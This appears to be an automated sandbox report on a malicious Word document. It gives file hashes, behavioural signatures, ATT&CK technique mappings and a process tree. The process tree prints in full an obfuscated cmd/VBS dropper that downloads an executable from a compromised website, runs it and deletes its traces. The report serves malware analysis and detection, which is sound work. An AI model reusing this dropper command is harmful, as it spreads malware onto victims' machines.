b15d63681c17e2aad8ae6d656c451ed51d4116345513c288b0127fbdebc60f02

General

Target

ed3b0943b223fcad9d78973af5410fa3_JaffaCakes118.doc
Size

29KB
MD5

ed3b0943b223fcad9d78973af5410fa3
SHA1

6d78285c8092121ecd65195c03aee430bad8013a
SHA256

b15d63681c17e2aad8ae6d656c451ed51d4116345513c288b0127fbdebc60f02
SHA512

1d296539f4d6568dbbde8e3cdc08e0221860cb02e199e081b81b0ee1624eab6c7e208ce939c2ff827a79881f6bf12d2d2eb3384372ecd1e2123e376711838672
SSDEEP

192:w4NslLZEvA+6/6r8px8SmvowzxM4LFs3ur9VYCD2hfuEus7a40j0pkB1t2la8:w98iS8px8SMDMtuvh6mKa40j0p4ty

Score

10^/10

discovery

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1716	2032	CMd.exe	29

Blocklisted process makes network request 5 IoCs

flow	pid	Process
5	2376	WScript.exe
6	2376	WScript.exe
7	2376	WScript.exe
8	2376	WScript.exe
9	2376	WScript.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe

System Time Discovery 1 TTPs 1 IoCs

Adversary may gather the system time and/or time zone settings from a local or remote system.

discovery

System Time Discovery

T1124

pid	Process
1716	CMd.exe

Office loads VBA resources, possible macro or embedded object present

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2924	timeout.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2032	WINWORD.EXE

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2032	WINWORD.EXE
2032	WINWORD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2032 wrote to memory of 1716	2032	WINWORD.EXE	30
PID 2032 wrote to memory of 1716	2032	WINWORD.EXE	30
PID 2032 wrote to memory of 1716	2032	WINWORD.EXE	30
PID 2032 wrote to memory of 1716	2032	WINWORD.EXE	30
PID 1716 wrote to memory of 2376	1716	CMd.exe	33
PID 1716 wrote to memory of 2376	1716	CMd.exe	33
PID 1716 wrote to memory of 2376	1716	CMd.exe	33
PID 1716 wrote to memory of 2376	1716	CMd.exe	33
PID 1716 wrote to memory of 2924	1716	CMd.exe	35
PID 1716 wrote to memory of 2924	1716	CMd.exe	35
PID 1716 wrote to memory of 2924	1716	CMd.exe	35
PID 1716 wrote to memory of 2924	1716	CMd.exe	35
PID 2032 wrote to memory of 1512	2032	WINWORD.EXE	36
PID 2032 wrote to memory of 1512	2032	WINWORD.EXE	36
PID 2032 wrote to memory of 1512	2032	WINWORD.EXE	36
PID 2032 wrote to memory of 1512	2032	WINWORD.EXE	36

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ed3b0943b223fcad9d78973af5410fa3_JaffaCakes118.doc"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2032
- C:\Windows\SysWOW64\CMd.exe
  CMd /c cd %TEMP% & @ECHO J0x= "http://ellesmerefamilyhealth.com/wp-admin/network/Module/stub.exe">>A4e.VBS &@ECHO F2s = Y1z("O]Z[YLXP9PcP")>>A4e.VBS &@ECHO Set X4s = CreateObject(Y1z("X^cXW=9cXWS__["))>>A4e.VBS &@ECHO X4s.Open Y1z("RP_"), J0x, False>>A4e.VBS &@ECHO X4s.send ("")>>A4e.VBS &@ECHO Set M8g = CreateObject(Y1z("LOZOM9^_]PLX"))>>A4e.VBS &@ECHO M8g.Open>>A4e.VBS &@ECHO M8g.Type = 1 >>A4e.VBS &@eCHo M8g.Write X4s.ResponseBody>>A4e.VBS &@ECHO M8g.Position = 0 >>A4e.VBS &@ECHO M8g.SaveToFile F2s, 2 >>A4e.VBS &@ECHO M8g.Close>>A4e.VBS &@ECHO function Y1z(R8x) >> A4e.VBS &@ECHO For W3t = 1 To Len(R8x) >>A4e.VBS &@ECHO C9d = Mid(R8x, W3t, 1) >>A4e.VBS &@ECHO C9d = Chr(Asc(C9d)- 11) >>A4e.VBS &@ECHO J4g = J4g + C9d >> A4e.VBS &@ECHO Next >>A4e.VBS &@ECHO Y1z = J4g >>A4e.VBS &@ECHO End Function >>A4e.VBS & A4e.VBS &dEl A4e.VBS & tIMeOUT 13 & DROPNAME.EXE
  2⤵
  - Process spawned unexpected child process
  - System Location Discovery: System Language Discovery
  - System Time Discovery
  - Suspicious use of WriteProcessMemory
  PID:1716
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\A4e.VBS"
    3⤵
    - Blocklisted process makes network request
    - System Location Discovery: System Language Discovery
    PID:2376
- - C:\Windows\SysWOW64\timeout.exe
    tIMeOUT 13
    3⤵
    - System Location Discovery: System Language Discovery
    - Delays execution with timeout.exe
    PID:2924
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1512

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

System Time Discovery

1

T1124

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\A4e.VBS

Filesize
325B

MD5
d533c8f6b6794a077029662a4c73c927

SHA1
54bfe446a1404b223a3e1aae173cb0450da71a32

SHA256
74aa2e7c0251ac7439aa0bcd6e68685474d13580831eb306a99e321722bb45ae

SHA512
965d1e88c3d4faa5c58aa9d4970bd3f777910f06c7173d368b944b358b918fae8697957a5b5b2a236a27261a18339ed4dcd79735f44598083e777a3843eb5f4f

Download Submit
C:\Users\Admin\AppData\Local\Temp\A4e.VBS

Filesize
521B

MD5
99db42a11ba4cd52e4b48bc65ff24bae

SHA1
8f11ae0a4f55c8f84225e97105aa1f02eac06316

SHA256
de41a4c0cb0d8ea57a8ced55958219b0fd83ce76c96646062904fd80d82bc841

SHA512
4f936cd5f425f54f1cf59ae46f9bc7f854b9020f2f78daac661bde79bcc61a9bf650c99b70b2aca448e4e11d482afd46779d71ae00e7950fa32ba111abec7e9c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
19KB

MD5
d034ab3ff1bddbd85657a21c1c19b7cd

SHA1
4b71a930704acf9e71fad29de5f10ae8102a5c04

SHA256
bb475a7e4967cb70e700b722984d7f9f305b9d5a6845bdab8acf626503cfa6c8

SHA512
95aba42c11717de5d3d4b2a35245ba8c46dfed2d953f0e9f6de51c998c85100a950bef1f3756787e7cc0446794a6ed7dab7c4170aff7191c752db34eefb0c544

Download Submit
memory/2032-4-0x0000000000480000-0x0000000000580000-memory.dmp

Filesize
1024KB

Download
memory/2032-5-0x0000000000480000-0x0000000000580000-memory.dmp

Filesize
1024KB

Download
memory/2032-6-0x0000000000480000-0x0000000000580000-memory.dmp

Filesize
1024KB

Download
memory/2032-0-0x000000002F6A1000-0x000000002F6A2000-memory.dmp

Filesize
4KB

Download
memory/2032-2-0x0000000070C5D000-0x0000000070C68000-memory.dmp

Filesize
44KB

Download
memory/2032-62-0x0000000070C5D000-0x0000000070C68000-memory.dmp

Filesize
44KB

Download
memory/2032-63-0x0000000000480000-0x0000000000580000-memory.dmp

Filesize
1024KB

Download
memory/2032-78-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2032-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2032-79-0x0000000000480000-0x0000000000580000-memory.dmp

Filesize
1024KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads